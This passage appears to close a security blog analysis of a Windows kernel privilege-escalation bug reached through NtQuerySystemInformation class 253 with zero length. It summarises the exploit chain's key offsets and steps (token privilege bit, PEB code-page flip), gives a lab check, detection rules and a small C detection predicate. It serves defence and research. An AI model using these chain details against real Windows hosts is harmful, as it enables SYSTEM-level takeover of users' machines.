The two public sources disagree on patch status. The third-party news coverage at securityonline.info reports that Microsoft addressed the bug in the May 2026 Patch Tuesday. The canonical researcher writeup at pwn2nimron.com lists four builds (26200.8039, 26200.8117, 26200.8246, 26200.8328) as confirmed-vulnerable and includes no MSRC ticket, CVSS vector, or “fixed-in” build identifier. The most charitable reconciliation is that Microsoft did ship a fix but it has not been independently corroborated against the public build numbers in the researcher’s tested matrix. For defenders, the actionable response is the same in either case: verify on your own builds. In a lab, call NtQuerySystemInformation with SystemInformationClass = 253 and SystemInformationLength = 0 against a known-controlled kernel page on each build you care about, and confirm whether the write reaches the page (vulnerable) or the call returns STATUS_ACCESS_VIOLATION early (patched). Do not rely solely on news-source patch claims for a bug of this severity.

Key Takeaways

  • The defective check is structural: ProbeForWrite(buf, Length, alignment) is wrapped in if (Length), so passing Length=0 turns the entire probe into a no-op. Any syscall handler that “naturally” performs writes even for zero-length buffers is a class of bug to hunt for, not a one-off.
  • An “increment-only” primitive is sufficient for full LPE in modern Windows. Aimed at CmpLayerVersionCount it unlocks an OOB array index; aimed at CmpLayerVersions[9] it slides a NULL pointer into a user-controlled mapping; aimed at token+0x42 it lights up SeDebugPrivilege. The same three writes do all of the work.
  • The kernel’s willingness to dereference user-mode pointers (no SMAP enforcement on Windows) is the structural enabler for the read primitive. On SMAP-enforced operating systems this technique would not work.
  • The Windows UTF-8 fork inside RtlUnicodeStringToAnsiString is a powerful round-trip path that converts a raw kernel-byte read into a recoverable user-mode string. Setting PEB+0x34C = 0xFDE9 from user space is enough to flip the kernel onto the lossless path.
  • The cleanup via byte-wise carry overflow demonstrates that even one-way primitives can restore state precisely when the attacker is willing to think about which bytes the carry can and cannot reach.
  • The bug is reachable from any integrity level, including Untrusted Integrity inside the Chrome renderer sandbox. Any renderer code-execution vulnerability in Chrome / Edge / Firefox is, on an unpatched host, effectively a SYSTEM grant.
  • Audited code is not a synonym for safe code. The class-5 sibling of class 253 is safe; class 253 reuses most of the same path and is not. “Most-audited syscall” is exactly where this bug lived for years.

Defensive Recommendations

  • Verify patch state on your specific builds. If you are on Windows 11 24H2 or 25H2, run a controlled lab test, aimed at a kernel address you know and control, against each build number you have in the fleet before declaring it patched.
  • Hunt for the exact syscall fingerprint. If your EDR exposes syscall telemetry, alert on NtQuerySystemInformation with SystemInformationClass == 253 AND SystemInformationLength == 0. The combination is otherwise extremely rare. Add a sibling rule for class 222 with index > 3.
  • Hunt for the PEB UTF-8 flip. A user-mode write of 0xFDE9 to PEB+0x34C by a non-localization-aware process is itself a high-fidelity signal — it is what the exploit uses to switch the kernel onto the lossless conversion path.
  • Hunt for prefetch-side-channel timing patterns. Step 1 of the chain relies on the public prefetch-tool; correlating an unusual prefetch-cache probe with a subsequent NtQuerySystemInformation class-253 call from the same process is a high-fidelity chain detection.
  • Treat browser renderer compromise as kernel-level compromise on unpatched hosts. Until the patch is verified deployed, plan IR against any in-the-wild renderer RCE on Chrome / Edge / Firefox as a SYSTEM compromise, not a sandboxed nuisance.
  • Block the public PoC by hash in WDAC / AppLocker. Pre-compute SHA-256s of common builds of the public repository’s artefacts and deny-list them on endpoints during the rollout window.
  • Code-review sibling info classes in ExpQuerySystemInformation. The defective code path (goto LABEL_11 skipping the buffer clear, length check stored not returned) is structural; other classes may share the shape. The hand-decompilation in the canonical writeup is enough to bootstrap an audit.
  • Track the Windows SMAP roadmap. Once SMAP enforcement ships in Windows, the read half of this chain (and a large family of similar techniques) becomes structurally impossible. Engage your Windows account team on the timeline.
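The syscall-fingerprint recommendation above can be expressed as a small predicate over telemetry records. The sketch below assumes a hypothetical event layout (qsi_event and its field names are invented for illustration, and real EDR schemas will differ); only the two conditions themselves, class 253 with zero length and class 222 with an index above 3, come from the text.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical telemetry record; field names are illustrative only. */
typedef struct {
    uint32_t info_class;   /* SystemInformationClass                        */
    uint32_t info_length;  /* SystemInformationLength                       */
    uint32_t layer_index;  /* first DWORD of the input buffer, if captured  */
} qsi_event;

enum {
    CLASS_PROCESS_EXTENSION = 253,  /* SystemProcessInformationExtension    */
    CLASS_BUILD_VERSION     = 222,  /* build-version query                  */
    MAX_POPULATED_LAYER     = 3     /* indices 0..3 are populated           */
};

/* Flag the two call shapes described in the recommendations. */
bool is_suspicious(const qsi_event *ev)
{
    assert(ev != NULL);
    if (ev->info_class == CLASS_PROCESS_EXTENSION && ev->info_length == 0)
        return true;
    if (ev->info_class == CLASS_BUILD_VERSION && ev->layer_index > MAX_POPULATED_LAYER)
        return true;
    return false;
}
```

A class-253 event with a non-zero length, or a class-222 event with an index of 3 or lower, is not flagged; whether those cases deserve a lower-severity rule is a tuning decision for the deployment.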

Conclusion

CVE-2026-40369 is, in three lines of vulnerable code, one of the cleanest illustrations in recent memory of how a small validation oversight (ProbeForWrite ducking when Length=0) becomes a full SYSTEM exploit when an attacker is willing to do the structural work to chain it. The Pwn2Own backstory and the explicit framing as a Chrome-renderer-sandbox-escape make the threat-model unusually concrete: assume the attacker is already inside the renderer, give them no privileges, no integrity, no Win32k, no GDI — the chain still ends in SYSTEM and the OS is left looking pristine. The lesson for code reviewers is that “the most-audited syscall” is not the same as “the safest syscall”; the lesson for defenders is that telemetry on rare-but-cheap-to-detect call shapes (class 253 with Length=0; PEB 0xFDE9 writes) is more reliable than waiting for a patch signal that may not arrive. Credit and thanks to Ori Nimron for the writeup, the IDA work, and the structured public PoC; the canonical reference is and remains pwn2nimron.com/blog together with the CVE-2026-40369-EXPLOIT repository.

References

Credit and thanks to Ori Nimron — the IDA decompilations, the PoC, the crash dump, the exploit chain and the structural insight in this post are all his. The canonical writeup at pwn2nimron.com remains the authoritative reference.
